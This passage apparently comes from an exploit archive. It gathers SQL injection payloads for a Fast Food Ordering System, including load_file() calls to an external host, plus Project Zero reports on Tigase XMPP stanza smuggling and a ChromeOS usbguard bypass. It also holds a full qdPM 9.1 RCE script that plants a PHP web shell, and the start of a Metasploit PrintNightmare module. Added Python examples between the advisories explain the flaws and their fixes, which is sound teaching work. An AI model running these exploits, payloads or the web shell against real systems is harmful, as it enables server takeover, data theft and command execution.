(SELECT(SLEEP(5)))gZCj) AND 'vMqP'='vMqP<br /><br /></code></pre>
<pre><code>## Title: Fast Food Ordering System 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.30.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering<br /><br /><br /><br />## Description:<br />The date parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'<br />was submitted in the date parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />An attacker can take control of the administrator account and of every<br />other account on this system, and can also download all of the<br />information stored in it.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: date (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />OR NOT 9209=9209 AND 'OBPK'='OBPK<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />AND (SELECT 1113 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT<br />(ELT(1113=1113,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BQRx'='BQRx<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />AND (SELECT 2021 FROM (SELECT(SLEEP(5)))KAaB) AND 'ECXY'='ECXY<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 6 columns<br /> Payload: page=reports&date=2022-05-30'+(select<br />load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,CONCAT(0x7178716271,0x785874484e685679414c78427953454c4b62524778654f596e645841574978764f414a7a6d616372,0x71706a7671),NULL,NULL,NULL,NULL,NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/kkyrgk)<br /><br /></code></pre>
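Both of the SQL injection advisories above (the `id` parameter of `view_stock.php`, whose vulnerable line is quoted, and the `date` parameter of the Fast Food Ordering System's reports page) come from the same construction: a request value pasted into the SQL text. The following Python is an added example, not either application's code: it rebuilds the quoted `view_stock.php` query over an in-memory SQLite table with constructed rows, runs sqlmap's boolean payload from the first advisory against it to show the row-count difference a blind injection relies on, and then runs the same payload against the parameterized form, where it is just an item id that matches nothing. SQLite accepts the same backtick identifier quoting and `date()` call as the original MySQL query.

```python
"""Added example, not the applications' code: the interpolated query from
view_stock.php rebuilt over SQLite (constructed rows) beside the
parameterized query that closes the blind boolean oracle."""
import sqlite3

TRUE_PAYLOAD = "1' AND 1902=1902 AND 'yluX'='yluX"   # sqlmap's payload from the advisory
FALSE_PAYLOAD = "1' AND 1902=1903 AND 'yluX'='yluX"  # constructed: same shape, false condition


def make_db() -> sqlite3.Connection:
    """In-memory stockin_list with three constructed rows (two for item 1)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE `stockin_list` (id INTEGER PRIMARY KEY, item_id INTEGER, "
        "`date` TEXT, qty INTEGER)"
    )
    conn.executemany(
        "INSERT INTO `stockin_list` (item_id, `date`, qty) VALUES (?, ?, ?)",
        [(1, "2022-05-29", 10), (1, "2022-05-30", 5), (2, "2022-05-30", 7)],
    )
    return conn


def view_stock_vulnerable(conn: sqlite3.Connection, item_id: str):
    # Same construction as line 74 of view_stock.php: the value becomes SQL text,
    # so the quote in the payload ends the literal and the rest is parsed as SQL.
    sql = f"SELECT * FROM `stockin_list` WHERE item_id = '{item_id}' ORDER BY date(`date`) ASC"
    return conn.execute(sql).fetchall()


def view_stock_fixed(conn: sqlite3.Connection, item_id: str):
    # Bound parameter: the value travels separately from the statement, so any
    # quotes or keywords in it are compared as data, never parsed.
    sql = "SELECT * FROM `stockin_list` WHERE item_id = ? ORDER BY date(`date`) ASC"
    return conn.execute(sql, (item_id,)).fetchall()


def blind_oracle_rows(query_fn) -> tuple:
    """Row counts for the true and the false payload.  A difference between
    the two is exactly the signal a boolean-based blind injection reads."""
    conn = make_db()
    return len(query_fn(conn, TRUE_PAYLOAD)), len(query_fn(conn, FALSE_PAYLOAD))


if __name__ == "__main__":
    print("interpolated (true, false):", blind_oracle_rows(view_stock_vulnerable))
    print("parameterized (true, false):", blind_oracle_rows(view_stock_fixed))
    print("parameterized, legitimate id 1:", view_stock_fixed(make_db(), "1"))
```

The same change applies to the `date` parameter of the reports page: bind it as a parameter (and, since it is a date, validate its format first), and the `load_file()` sub-query in the payload is never evaluated because it is never parsed as SQL.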
<pre><code>Tigase XMPP server: XMPP stanza smuggling via unescaped quotes<br /><br />Tigase XMPP server suffers from a security vulnerability due to not escaping the double quote character when serializing parsed XML. This can be used to "smuggle" (or, if you prefer, inject) arbitrary attacker-controlled stanzas into the XMPP server's output stream. A malicious client can abuse this vulnerability to send arbitrary XMPP stanzas to another client (including the control stanzas that are only meant to be sent by the server).<br /><br />Consider for example the following XML tag<br /><br /><foo attr='aaa"bbb' /><br /><br />which contains a single attribute enclosed in *single* quotes.<br /><br />When Tigase parses and then serializes the element, it will convert single quotes to double quotes; however, it will not escape the double quote. Thus the output becomes<br /><br /><foo attr="aaa"bbb" /><br /><br />which is invalid XML. The corresponding code for serializing attributes can be seen in https://github.com/tigase/tigase-xmltools/blob/b0c64df99f62b88bec7c152d52027369b6415ada/src/main/java/tigase/xml/Element.java#L845<br /><br />To see how this issue can be used to smuggle arbitrary stanzas through the server, consider for example the following incoming stanza<br /><br /><message ...><br /> <body><br /> <body a='a"/>' >text</body><br /> <message a='a"/>' >text</message><br /> <iq>...</iq><br /> <message a='a">' /><br /> <body a='a">' /><br /> </body><br /></message><br /><br />When this stanza gets parsed by the server, the corresponding tree is<br /><br /> -message<br /> --body<br /> ---body with attribute name=a value=a"/><br /> ----cdata=text<br /> ---message with attribute name=a value=a"/><br /> ----cdata=text<br /> ---iq<br /> ---message with attribute name=a value=a"><br /> ---body with attribute name=a value=a"><br /> <br />However, when such a stanza gets serialized and forwarded to the recipient client (or another XMPP server) it becomes<br /><br /><message ...><body><body a="a"/>" >text</body><message a="a"/>" >text</message><iq>...</iq><message a="a">" /><body a="a">" /></body></message><br /><br />(single quoted attributes became double quoted)<br />When the receiving client parses it, the corresponding tree is seen as<br /><br /> -message<br /> --body<br /> ---body with attribute name=a value=a<br /> ---cdata=" >text<br /> --message with attribute name=a value=a<br /> --cdata=" >text<br /> -iq<br /> -message with attribute name=a value=a<br /> --cdata=>" /><br /> --body with attribute name=a value=a<br /> ---cdata=>" /><br /><br />This works because, after the quote, we used '/>' instead of '>' and vice-versa to change the semantics of the closing tags.<br /><br />As can be seen in the tree above, the receiving client will consider the iq tag (that was originally a part of the message body tree) as a new stanza at the same "depth" in the XML tree as the message stanza.<br /><br />As mentioned above, this can be used to "smuggle" arbitrary stanzas through the XMPP server to the victim client. This can be used for message spoofing (making it appear a message was sent by a different sender), but also, depending on the XMPP extensions the client implements and what data is sent over XMPP, it can have impact beyond that (e.g. potentially redirecting the connection through a malicious XMPP server, code execution).<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2022-06-12.<br /><br /><br /><br /><br />Found by: ifratric@google.com<br /><br /></code></pre>
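The two parse trees in the report can be reproduced with a few lines of Python. The following is an added example, not Tigase's code: a minimal serializer that, with escaping off, mirrors the described behaviour (single-quoted input re-emitted with double quotes and the embedded `"` copied through), and with escaping on emits `&quot;`; the output is then re-parsed the way a receiving side would, inside a stream root, and the tags at stream depth are listed. The stanza is a constructed, whitespace-free copy of the one in the report with the outer message's attributes omitted and `<iq>...</iq>` reduced to `<iq/>`.

```python
"""Added example, not Tigase's code: a serializer that reproduces the
unescaped-quote behaviour and its fix, re-parsing the output to show where
the iq element ends up."""
import xml.etree.ElementTree as ET

# Constructed copy of the report's stanza (no whitespace, no outer attributes).
STANZA = ("<message><body>"
          "<body a='a\"/>'>text</body>"
          "<message a='a\"/>'>text</message>"
          "<iq/>"
          "<message a='a\">'/>"
          "<body a='a\">'/>"
          "</body></message>")


def escape_text(s: str) -> str:
    return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


def escape_attr(s: str) -> str:
    # An attribute value must also escape the delimiter that encloses it.
    return escape_text(s).replace('"', "&quot;")


def serialize(elem: ET.Element, escape_attrs: bool) -> str:
    """Re-emit a parsed tree with double-quoted attributes.  With
    escape_attrs=False this mirrors the vulnerable behaviour: the value is
    copied through verbatim, so an embedded '"' ends the attribute early."""
    out = [f"<{elem.tag}"]
    for name, value in elem.attrib.items():
        out.append(f' {name}="{escape_attr(value) if escape_attrs else value}"')
    children = list(elem)
    if not children and not elem.text:
        out.append("/>")
        return "".join(out)
    out.append(">")
    if elem.text:
        out.append(escape_text(elem.text))
    for child in children:
        out.append(serialize(child, escape_attrs))
        if child.tail:
            out.append(escape_text(child.tail))
    out.append(f"</{elem.tag}>")
    return "".join(out)


def top_level_tags(serialized: str) -> list:
    """Parse as a receiving side would: a sequence of stanzas under a stream
    root.  Returns the element names seen at stream depth."""
    stream = ET.fromstring(f"<stream>{serialized}</stream>")
    return [child.tag for child in stream]


def roundtrip(escape_attrs: bool) -> list:
    """Parse the stanza, serialize it one way or the other, list the tags a
    recipient sees at stream depth."""
    return top_level_tags(serialize(ET.fromstring(STANZA), escape_attrs))


if __name__ == "__main__":
    print("unescaped :", serialize(ET.fromstring(STANZA), False))
    print("  stream-level tags:", roundtrip(False))
    print("escaped   :", serialize(ET.fromstring(STANZA), True))
    print("  stream-level tags:", roundtrip(True))
```

With escaping off the recipient sees `message`, `iq`, `message` as three separate stanzas, matching the report's second tree; with `&quot;` escaping the output round-trips to the original tree and the `iq` stays inside the message body. The general rule the fix applies: a serializer must escape for the exact delimiter it chooses, not for the one the input happened to use.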
<pre><code>ChromeOS' usage of usbguard is bypassable<br /><br />VULNERABILITY DETAILS<br />ChromeOS uses https://usbguard.github.io/ when the screen is locked (but not<br />on the login screen, perhaps because it is expected that code execution is much<br />less helpful when the disk is still encrypted?).<br /><br />When the screen is locked, a policy is applied that might look like this<br />(example from my Pixelbook):<br /><br />```<br />allow id 0bda:564b serial "\x07LOE65001063010A78M015CFAI06BF12000" name "WebCamera" hash "KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type "hardwired"<br />allow id 1d6b:0002 serial "0000:00:14.0" name "xHCI Host Controller" hash "jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=" with-interface 09:00:00 with-connect-type ""<br />allow id 1d6b:0003 serial "0000:00:14.0" name "xHCI Host Controller" hash "3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=" with-interface 09:00:00 with-connect-type ""<br />allow id 8087:0a2a serial "" name "" hash "AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type "hardwired"<br />####################################################################################################<br /># Footer.<br />####################################################################################################<br />block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storage<br />allow<br />```<br /><br />As you can see, it mostly just allowlists specific devices with full hashes of<br />the expected USB configuration descriptors, and internal USB devices are marked<br />such that they won't be accepted on external USB ports.<br />(Which, by the way, might not actually be necessary, since the USB subsystem's<br />`authorized_default` flag is set to 2 when the screen is locked, not 0, meaning<br />internal USB devices are automatically allowed anyway?)<br /><br />But then at the bottom is this footer that blocks USB devices with interface<br />descriptors that contain the following `bInterfaceClass` values:<br /><br /> - USB_CLASS_PHYSICAL (5)<br /> - USB_CLASS_STILL_IMAGE (6)<br /> - USB_CLASS_PRINTER (7)<br /> - USB_CLASS_MASS_STORAGE (8)<br /><br />Afterwards, anything else is permitted.<br /><br />This configuration footer comes from<br /><https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>.<br />The interface-based classification of devices was introduced in<br /><https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>.<br /><br /><br />Apart from the problem that there is a large amount of attack surface in drivers<br />for devices that don't belong into those USB interface classes, there is another<br />issue with this approach:<br /><br />The kernel often doesn't care what USB class a device claims to be.
The way USB<br />drivers tend to work, even for standardized protocols, is that the driver<br />specifies with low priority that it would like to bind to standards-compliant<br />devices using the proper USB interface class, but also specifies with high<br />priority that it would like to bind to specific USB devices based on Vendor ID<br />and Product ID, without caring about their USB interface class.<br /><br /><br />As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick inserted<br />while the screen is locked doesn't get past the authorization check:<br /><br />[ 6411.611320] usb 1-1: new high-speed USB device number 31 using xhci_hcd<br />[ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10<br />[ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3<br />[ 6411.738916] usb 1-1: Product: [...]<br />[ 6411.738921] usb 1-1: Manufacturer: SanDisk<br />[ 6411.738926] usb 1-1: SerialNumber: [...]<br />[ 6411.740583] usb 1-1: Device is not authorized for usage<br />[ 6414.875133] cros-ec-sensorhub [...]<br />[ 6418.603609] usb 1-1: USB disconnect, device number 31<br /><br />But if we use a Linux machine with appropriate hardware (I'm using a NET2380 dev<br />board, but you could probably also do it with an unlocked Pixel phone or a<br />Raspberry Pi Zero W or something like that) to emulate a USB Mass Storage<br />device, using <https://docs.kernel.org/usb/mass-storage.html>, and patch one<br />line in the attacker kernel so that it claims to be a billboard, not a storage<br />device:<br /><br /><br />diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.c<br />index b859a158a414..d7452c8458a9 100644<br />--- a/drivers/usb/gadget/function/storage_common.c<br />+++ b/drivers/usb/gadget/function/storage_common.c<br />@@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = {<br /> .bDescriptorType = USB_DT_INTERFACE,<br /> <br /> 
.bNumEndpoints = 2, /* Adjusted during fsg_bind() */<br />- .bInterfaceClass = USB_CLASS_MASS_STORAGE,<br />+ .bInterfaceClass = USB_CLASS_BILLBOARD,<br /> .bInterfaceSubClass = USB_SC_SCSI, /* Adjusted during fsg_bind() */<br /> .bInterfaceProtocol = USB_PR_BULK, /* Adjusted during fsg_bind() */<br /> .iInterface = FSG_STRING_INTERFACE,<br /><br /><br />Then we can connect just fine even while the screen is locked - first we get a<br />\"Device is not authorized\" message on the initial connection, then usbguard<br />unblocks us and the kernel probes the device as a mass storage device and scans<br />the partition table:<br /><br />[ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd<br />[ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17<br />[ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0<br />[ 6432.885653] usb 1-1: Product: Mass Storage Gadget<br />[ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280<br />[ 6432.886121] usb 1-1: Device is not authorized for usage<br />[ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected<br />[ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000<br />[ 6432.892090] scsi host0: usb-storage 1-1:1.0<br />[ 6432.892567] usb 1-1: authorized to connect<br />[ 6433.920354] scsi 0:0:0:0: Direct-Access Linux File-Stor Gadget 0517 PQ: 0 ANSI: 2<br />[ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred<br />[ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB)<br />[ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off<br />[ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00<br />[ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA<br />[ 6434.363462] sda: sda1 sda2<br />[ 6434.585367] cros-ec-sensorhub [...]<br />[ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI disk<br /><br /><br />I haven't looked 
at how this issue applies to other USB subsystems in detail,<br />but from a quick glance:<br /><br /> - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some<br /> number-to-string translation table, so I don't think it matters to the kernel.<br /> - Same thing with USB_CLASS_STILL_IMAGE.<br /> - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but<br /> that check is intentionally bypassed for known devices that are marked in<br /> the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the<br /> \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you<br /> can probably also bypass the blocking of the printer interface class that way.<br /><br /><br /><br />I think the best way forward would be to look into whether it is feasible to<br />rely exclusively on a trust-on-first-use approach. If that is infeasible, you<br />may have to talk to upstream about how userspace can reliably determine which<br />driver(s) a given USB device might be bound to, since I'm not aware of any<br />interface that would let you do that.<br /><br /><br />VERSION<br />Google Chrome 98.0.4758.107 (Official Build) (64-bit) <br />Revision a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167}<br />Platform 14388.61.0 (Official Build) stable-channel eve<br />Firmware Version Google_Eve.9584.230.0<br />Customization ID GOOGLE-EVE<br />ARC 8165997<br /><br /><br />CREDIT INFORMATION<br />Reporter credit: Jann Horn of Google Project Zero<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2022-05-25.<br /><br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
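The report's core observation, that the usbguard footer judges a device by the bInterfaceClass it declares while drivers bind through id tables whose Vendor ID/Product ID rows ignore that class, can be made concrete with a small model. The following is an added example, not code from the report, ChromeOS, usbguard or the kernel: the id-table excerpt, the Interface/Device/IdEntry types and the audit() helper are assumptions made for this illustration, with the two VID/PID pairs and the class codes taken from the report.

```python
"""Constructed model of the gap the report describes: usbguard's footer judges a
device by the bInterfaceClass it declares, while Linux drivers match id tables
whose vendor/product rows apply regardless of that class (added example)."""
from dataclasses import dataclass
from typing import List, Optional

# Class codes from include/uapi/linux/usb/ch9.h; the first four are the ones
# the quoted 99-rules.conf footer blocks while the screen is locked.
USB_CLASS_PHYSICAL, USB_CLASS_STILL_IMAGE = 5, 6
USB_CLASS_PRINTER, USB_CLASS_MASS_STORAGE = 7, 8
USB_CLASS_BILLBOARD = 0x11
LOCKED_BLOCKED_CLASSES = {USB_CLASS_PHYSICAL, USB_CLASS_STILL_IMAGE,
                          USB_CLASS_PRINTER, USB_CLASS_MASS_STORAGE}


@dataclass
class Interface:
    cls: int
    subclass: int
    protocol: int


@dataclass
class Device:
    vid: int
    pid: int
    interfaces: List[Interface]


@dataclass
class IdEntry:
    """One struct usb_device_id row; None means the field is not in match_flags."""
    driver: str
    vid: Optional[int] = None
    pid: Optional[int] = None
    intf_class: Optional[int] = None
    intf_subclass: Optional[int] = None
    intf_protocol: Optional[int] = None

    def matches(self, dev: Device, intf: Interface) -> bool:
        # Every field the row sets must match; unset fields are wildcards.
        wanted = [(self.vid, dev.vid), (self.pid, dev.pid),
                  (self.intf_class, intf.cls), (self.intf_subclass, intf.subclass),
                  (self.intf_protocol, intf.protocol)]
        return all(want is None or want == have for want, have in wanted)


# Constructed id-table excerpt (assumption) laid out as the report describes:
# device-specific rows first, generic class rows after them. The VID/PID rows
# are the two devices the report names; neither row looks at bInterfaceClass.
ID_TABLES = [
    IdEntry("usb-storage", vid=0x0525, pid=0xa4a5),  # Linux File-backed Storage Gadget
    IdEntry("usblp", vid=0x04b8, pid=0x0202),        # Seiko Epson M129C, USBLP_QUIRK_BAD_CLASS
    IdEntry("usb-storage", intf_class=USB_CLASS_MASS_STORAGE, intf_subclass=0x06, intf_protocol=0x50),
    IdEntry("usblp", intf_class=USB_CLASS_PRINTER, intf_subclass=1, intf_protocol=2),
]
# Drivers that implement a blocked class: binding one after usbguard said "allow"
# is precisely what the footer was meant to prevent.
BLOCKED_CLASS_DRIVERS = {e.driver for e in ID_TABLES if e.intf_class in LOCKED_BLOCKED_CLASSES}


def usbguard_footer_allows(dev: Device) -> bool:
    """The footer's rule: reject if any interface declares a blocked class."""
    return not any(i.cls in LOCKED_BLOCKED_CLASSES for i in dev.interfaces)


def drivers_that_would_bind(dev: Device, tables=ID_TABLES) -> List[str]:
    """Drivers with at least one id-table row matching some interface of dev."""
    return sorted({e.driver for e in tables for i in dev.interfaces if e.matches(dev, i)})


def audit(dev: Device) -> dict:
    """Policy view versus driver-binding view of one device."""
    allowed = usbguard_footer_allows(dev)
    drivers = drivers_that_would_bind(dev)
    return {"usbguard_allows": allowed, "drivers": drivers,
            "policy_bypassed": allowed and bool(set(drivers) & BLOCKED_CLASS_DRIVERS)}
```

For the two devices in the dmesg excerpts, `audit(Device(0x0781, 0x5580, [Interface(8, 6, 0x50)]))` reports `usbguard_allows` False, while `audit(Device(0x0525, 0xa4a5, [Interface(0x11, 6, 0x50)]))` reports `usbguard_allows` True with usb-storage still binding, so `policy_bypassed` is True.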
<pre><code># Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
# Exploit modification: RedHatAugust

#!/usr/bin/python3

import sys
import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()

def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
    }
    return request_1


def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)
    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),
    }
    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)


def main(HOSTNAME, EMAIL, PASSWORD):
    url = HOSTNAME + '/index.php/login'
    result = session_requests.get(url)
    #print(result.text)
    login_tree = html.fromstring(result.text)
    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}
    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
    # The designated admin account does not have a myAccount page
    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
    account_tree = html.fromstring(account_page.content)
    userid = account_tree.xpath("//input[@name='users[id]']/@value")
    username = account_tree.xpath("//input[@name='users[name]']/@value")
    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
    final_tree = html.fromstring(get_file.content)
    backdoor = requests.get(HOSTNAME + "uploads/users/")
    count = 0
    dateStamp = "1970-01-01 00:00"
    backdoorFile = ""
    for line in backdoor.text.split("\n"):
        count = count + 1
        if "backdoor.php" in str(line):
            try:
                start = "\"right\""
                end = " </td"
                line = str(line)
                dateStampNew = line[line.index(start)+8:line.index(end)]
                if (dateStampNew > dateStamp):
                    dateStamp = dateStampNew
                    print("The DateStamp is " + dateStamp)
                    backdoorFile = line[line.index("href")+6:line.index("php")+3]
            except:
                print("Exception occurred")
                continue
    #print(backdoor)
    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')

if __name__ == '__main__':
    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')
    parser.add_argument('-p', '--password', dest='password', help='User password')
    args = parser.parse_args()
    # Added detection if the arguments are passed and populated, if not display the arguments
    if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):
        main(args.hostname, args.email, args.password)
    else:
        parser.print_help()
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'windows_error'
require 'ruby_smb'
require 'ruby_smb/error'

class MetasploitModule < Msf::Exploit::Remote

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Retry
  include Msf::Exploit::EXE
  include Msf::Exploit::Deprecated

  moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'

  PrintSystem = RubySMB::Dcerpc::PrintSystem

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Print Spooler Remote DLL Injection',
        'Description' => %q{
          The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted
          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN
          vector which requires the Print Spooler service to be running.
        },
        'Author' => [
          'Zhiniang Peng', # vulnerability discovery / research
          'Xuefeng Li', # vulnerability discovery / research
          'Zhipeng Huo', # vulnerability discovery
          'Piotr Madej', # vulnerability discovery
          'Zhang Yunhai', # vulnerability discovery
          'cube0x0', # PoC
          'Spencer McIntyre', # metasploit module
          'Christophe De La Fuente', # metasploit module co-author
        ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'SRVHOST' => Rex::Socket.source_address
        },
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          [
            'Windows', {
              'Platform' => 'win',
              'Arch' => [ ARCH_X64, ARCH_X86 ]
            },
          ],
        ],
        'DisclosureDate' => '2021-06-08',
        'References' => [
          ['CVE', '2021-1675'],
          ['CVE', '2021-34527'],
          ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],
          ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],
          ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],
          ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']
        ],
        'Notes' => {
          'AKA' => [ 'PrintNightmare' ],
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [UNRELIABLE_SESSION],
          'SideEffects' => [
            ARTIFACTS_ON_DISK # the dll will be copied to the remote server
          ]
        }
      )
    )

    register_advanced_options(
      [
        OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])
      ]
    )
    deregister_options('AutoCheck')
  end

  def check
    begin
